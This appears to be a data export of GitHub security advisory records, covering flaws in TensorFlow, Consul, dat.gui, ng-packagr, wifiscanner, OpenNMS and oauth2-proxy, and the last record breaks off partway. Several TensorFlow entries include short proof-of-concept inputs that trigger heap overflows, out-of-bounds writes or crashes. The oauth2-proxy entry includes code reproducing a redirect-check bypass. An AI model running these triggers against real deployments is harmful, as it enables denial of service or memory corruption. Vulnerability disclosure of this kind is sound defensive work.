+1.4.0,GHSA-6f89-8j54-29xf,2021-05-18T18:08:57Z,2021-05-21T14:26:21Z,,['CVE-2021-29578'],Heap buffer overflow in `FractionalAvgPoolGrad`,"### Impact +The implementation of `tf.raw_ops.FractionalAvgPoolGrad` is vulnerable to a heap buffer overflow: + +```python +import tensorflow as tf + +orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) +out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) +row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) +col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) + + +tf.raw_ops.FractionalAvgPoolGrad( + orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, + row_pooling_sequence=row_pooling_sequence, + col_pooling_sequence=col_pooling_sequence, overlapping=False) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/dcba796a28364d6d7f003f6fe733d82726dda713/tensorflow/core/kernels/fractional_avg_pool_op.cc#L216) fails to validate that the pooling sequence arguments have enough elements as required by the `out_backprop` tensor shape. + +### Patches +We have patched the issue in GitHub commit [12c727cee857fa19be717f336943d95fca4ffe4f](https://github.com/tensorflow/tensorflow/commit/12c727cee857fa19be717f336943d95fca4ffe4f). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6f89-8j54-29xf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29578'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/12c727cee857fa19be717f336943d95fca4ffe4f'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:08:57Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-23jv-v6qj-3fhh,2023-09-29T15:52:57Z,2021-05-18T18:19:21Z,,['CVE-2020-7219'],Denial of Service (DoS) in HashiCorp Consul,"HashiCorp Consul and Consul Enterprise up to 1.6.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 1.6.3. + +### Specific Go Packages Affected +github.com/hashicorp/consul/agent/consul","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7219'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/issues/7159'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul/'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T15:07:53Z', 'nvd_published_at': '2020-01-31T13:15:00Z'}" +1.4.0,GHSA-chwr-hf3w-c984,2021-04-21T17:36:43Z,2021-05-10T18:44:38Z,,['CVE-2020-7755'],Regular Expression Denial of Service in dat.gui,All versions of package dat.gui are vulnerable to Regular Expression Denial of Service (ReDoS) via specifically crafted rgb and rgba values.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'dat.gui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7755'}, {'type': 'WEB', 'url': 'https://github.com/dataarts/dat.gui/issues/278'}, {'type': 'WEB', 'url': 'https://github.com/dataarts/dat.gui/pull/279'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DATGUI-1016275'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/dat.gui'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T17:36:43Z', 'nvd_published_at': '2020-10-27T18:15:00Z'}" +1.4.0,GHSA-qm28-7hqv-wg5j,2021-10-05T16:28:05Z,2021-05-07T16:47:32Z,,['CVE-2020-7735'],OS Command Injection in ng-packagr,The package ng-packagr before 10.1.1 are vulnerable to Command Injection via the styleIncludePaths option.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ng-packagr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7735'}, {'type': 'WEB', 'url': 'https://github.com/ng-packagr/ng-packagr/commit/bda0fff3443301f252930a73fdc8fb9502de596d'}, {'type': 'PACKAGE', 'url': 'https://github.com/ng-packagr/ng-packagr'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NGPACKAGR-1012427'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T22:00:56Z', 'nvd_published_at': '2020-09-25T12:15:00Z'}" +1.4.0,GHSA-wgfq-7857-4jcc,2021-04-28T16:57:11Z,2021-05-07T16:47:19Z,,['CVE-2020-8237'],Uncontrolled Resource Consumption in json-bigint,Prototype pollution in json-bigint npm package < 1.0.0 may lead to a denial-of-service (DoS) attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-bigint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8237'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/916430'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T16:57:11Z', 'nvd_published_at': '2020-09-18T21:15:00Z'}" +1.4.0,GHSA-m6rw-m2v9-7hx4,2021-07-29T19:48:29Z,2021-05-17T21:00:59Z,,['CVE-2020-15362'],OS Command Injection in wifiscanner,wifiscanner.js in thingsSDK WiFi Scanner 1.0.1 allows Code Injection because it can be used with options to overwrite the default executable/binary path and its arguments. An attacker can abuse this functionality to execute arbitrary code.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'wifiscanner'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15362'}, {'type': 'WEB', 'url': 'https://github.com/thingsSDK/wifiscanner/issues/1'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T21:36:14Z', 'nvd_published_at': '2020-06-29T17:15:00Z'}" +1.4.0,GHSA-4mf2-f3wh-gvf2,2021-05-21T21:37:23Z,2021-05-25T18:42:20Z,,['CVE-2021-21291'],Subdomain checking of whitelisted domains could allow unintended redirects in oauth2-proxy,"### Impact +_What kind of vulnerability is it? Who is impacted?_ +For users that use the whitelist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. + +For example, if a whitelist domain was configured for `.example.com`, the intention is that subdomains of `example.com` are allowed. +Instead, `example.com` and `badexample.com` could also match. + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ +This is fixed in version 7.0.0 onwards. + +### Workarounds +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ +Disable the whitelist domain feature and run separate OAuth2 Proxy instances for each subdomain. + +# Original Issue Posted by @semoac: + +Whitelist Domain feature is not working as expected because is not matching a dot to ensure the redirect is a subdomain. + +## Expected Behavior + +If whitelist domain is set to `.example.com` , then `hack.alienexample.com` should be rejected as a valid redirect. + +## Current Behavior + +The code is removing the `dot` from `.example.com` and only checking if the redirect string end with `example.com` + +## Possible Solution +Here +https://github.com/oauth2-proxy/oauth2-proxy/blob/c377466411f2aee180a732187edb638f2f7e57fb/oauthproxy.go#L661 + +Include the dot when checking the string: +``` +strings.HasSuffix(redirectHostname, ""."" + domainHostname) +``` + +## Steps to Reproduce (for bugs) + +``` +package main + +import ( + ""fmt"" + ""strings"" +) + +func validOptionalPort(port string) bool { + if port == """" || port == "":*"" { + return true + } + if port[0] != ':' { + return false + } + for _, b := range port[1:] { + if b < '0' || b > '9' { + return false + } + } + return true +} + +func splitHostPort(hostport string) (host, port string) { + host = hostport + + colon := strings.LastIndexByte(host, ':') + if colon != -1 && validOptionalPort(host[colon:]) { + host, port = host[:colon], host[colon+1:] + } + + if strings.HasPrefix(host, ""["") && strings.HasSuffix(host, ""]"") { + host = host[1 : len(host)-1] + } + + return +} + +func main() { + domain := "".example.com"" + domainHostname, _ := splitHostPort(strings.TrimLeft(domain, ""."")) + redirectHostname := ""https://hack.alienexample.com"" + if (strings.HasPrefix(domain, ""."") && strings.HasSuffix(redirectHostname, domainHostname)) { fmt.Println(""This should not have happen."")} +} + +``` + +Users of `github.com/oauth2-proxy/oauth2-proxy` are advised to update to `github.com/oauth2-proxy/oauth2-proxy/v7`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/oauth2-proxy/oauth2-proxy/v7'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/oauth2-proxy/oauth2-proxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-4mf2-f3wh-gvf2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21291'}, {'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2-proxy/commit/780ae4f3c99b579cb2ea9845121caebb6192f725'}, {'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2-proxy/releases/tag/v7.0.0'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/github.com/oauth2-proxy/oauth2-proxy/v7'}]","{'cwe_ids': ['CWE-601'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:37:23Z', 'nvd_published_at': None}" +1.4.0,GHSA-r6pg-pjwc-j585,2021-05-18T19:34:50Z,2021-05-21T14:25:11Z,,['CVE-2021-29565'],Null pointer dereference in `SparseFillEmptyRows`,"### Impact +An attacker can trigger a null pointer dereference in the implementation of `tf.raw_ops.SparseFillEmptyRows`: + +```python +import tensorflow as tf + +indices = tf.constant([], shape=[0, 0], dtype=tf.int64) +values = tf.constant([], shape=[0], dtype=tf.int64) +dense_shape = tf.constant([], shape=[0], dtype=tf.int64) +default_value = 0 + +tf.raw_ops.SparseFillEmptyRows( + indices=indices, values=values, dense_shape=dense_shape, + default_value=default_value) +``` + +This is because of missing [validation](https://github.com/tensorflow/tensorflow/blob/fdc82089d206e281c628a93771336bf87863d5e8/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L230-L231) that was covered under a `TODO`. If the `dense_shape` tensor is empty, then `dense_shape_t.vec<>()` would cause a null pointer dereference in the implementation of the op: + +```cc +template +struct SparseFillEmptyRows { + Status operator()(OpKernelContext* context, const Tensor& default_value_t, + const Tensor& indices_t, const Tensor& values_t, + const Tensor& dense_shape_t, + typename AsyncOpKernel::DoneCallback done) { + ... + const auto dense_shape = dense_shape_t.vec(); + ... + } +} +``` + +### Patches +We have patched the issue in GitHub commit [faa76f39014ed3b5e2c158593b1335522e573c7f](https://github.com/tensorflow/tensorflow/commit/faa76f39014ed3b5e2c158593b1335522e573c7f). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r6pg-pjwc-j585'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29565'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/faa76f39014ed3b5e2c158593b1335522e573c7f'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T19:34:50Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-jjhw-5mxp-2g2q,2021-05-28T22:27:50Z,2021-05-25T18:47:01Z,,['CVE-2021-25933'],Cross-site Scripting in OpenNMS Horizon,"In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function `validateFormInput()` performs improper validation checks on the input sent to the `groupName` and `groupComment` parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files which can cause severe damage to the organization using opennms.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '27.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25933'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/8a97e6869d6e49da18b208c837438ace80049c01,'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/eb08b5ed4c5548f3e941a1f0d0363ae4439fa98c'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/f3ebfa3da5352b4d57f238b54c6db315ad99f10e'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25933'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T17:29:49Z', 'nvd_published_at': '2021-05-20T15:15:00Z'}" +1.4.0,GHSA-whr9-vfh2-7hm6,2021-05-18T18:52:27Z,2021-05-21T14:25:28Z,,['CVE-2021-29571'],Memory corruption in `DrawBoundingBoxesV2`,"### Impact +The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: + +```python +import tensorflow as tf + +images = tf.fill([10, 96, 0, 1], 0.) +boxes = tf.fill([10, 53, 0], 0.) +colors = tf.fill([0, 1], 0.) + +tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/31bd5026304677faa8a0b77602c6154171b9aec1/tensorflow/core/kernels/image/draw_bounding_box_op.cc#L116-L130) assumes that the last element of `boxes` input is 4, as required by [the op](https://www.tensorflow.org/api_docs/python/tf/raw_ops/DrawBoundingBoxesV2). Since this is not checked attackers passing values less than 4 can write outside of bounds of heap allocated objects and cause memory corruption: + +```cc +const auto tboxes = boxes.tensor(); +for (int64 bb = 0; bb < num_boxes; ++bb) { + ... + const int64 min_box_row = static_cast(tboxes(b, bb, 0)) * (height - 1); + const int64 max_box_row = static_cast(tboxes(b, bb, 2)) * (height - 1); + const int64 min_box_col = static_cast(tboxes(b, bb, 1)) * (width - 1); + const int64 max_box_col = static_cast(tboxes(b, bb, 3)) * (width - 1); + ... +} +``` + +If the last dimension in `boxes` is less than 4, accesses similar to `tboxes(b, bb, 3)` will access data outside of bounds. Further during code execution there are also writes to these indices. + +### Patches +We have patched the issue in GitHub commit [79865b542f9ffdc9caeb255631f7c56f1d4b6517](https://github.com/tensorflow/tensorflow/commit/79865b542f9ffdc9caeb255631f7c56f1d4b6517). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-whr9-vfh2-7hm6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29571'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/79865b542f9ffdc9caeb255631f7c56f1d4b6517'}]","{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:52:27Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-m34j-p8rj-wjxq,2021-05-18T21:45:01Z,2021-05-21T14:23:28Z,,['CVE-2021-29546'],Division by 0 in `QuantizedBiasAdd`,"### Impact +An attacker can trigger an integer division by zero undefined behavior in `tf.raw_ops.QuantizedBiasAdd`: + +```python +import tensorflow as tf + +input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) +bias = tf.constant([], shape=[0], dtype=tf.quint8) +min_input = tf.constant(-10.0, dtype=tf.float32) +max_input = tf.constant(-10.0, dtype=tf.float32) +min_bias = tf.constant(-10.0, dtype=tf.float32) +max_bias = tf.constant(-10.0, dtype=tf.float32) + +tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, + max_input=max_input, min_bias=min_bias, + max_bias=max_bias, out_type=tf.qint32) +``` + +This is because the [implementation of the Eigen kernel](https://github.com/tensorflow/tensorflow/blob/61bca8bd5ba8a68b2d97435ddfafcdf2b85672cd/tensorflow/core/kernels/quantization_utils.h#L812-L849) does a division by the number of elements of the smaller input (based on shape) without checking that this is not zero: + +```cc +template +void QuantizedAddUsingEigen(const Eigen::ThreadPoolDevice& device, + const Tensor& input, float input_min, + float input_max, const Tensor& smaller_input, + float smaller_input_min, float smaller_input_max, + Tensor* output, float* output_min, + float* output_max) { + ... + const int64 input_element_count = input.NumElements(); + const int64 smaller_input_element_count = smaller_input.NumElements(); + ... + bcast[0] = input_element_count / smaller_input_element_count; + ... +} +``` + +This integral division by 0 is undefined behavior. + +### Patches +We have patched the issue in GitHub commit [67784700869470d65d5f2ef20aeb5e97c31673cb](https://github.com/tensorflow/tensorflow/commit/67784700869470d65d5f2ef20aeb5e97c31673cb). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 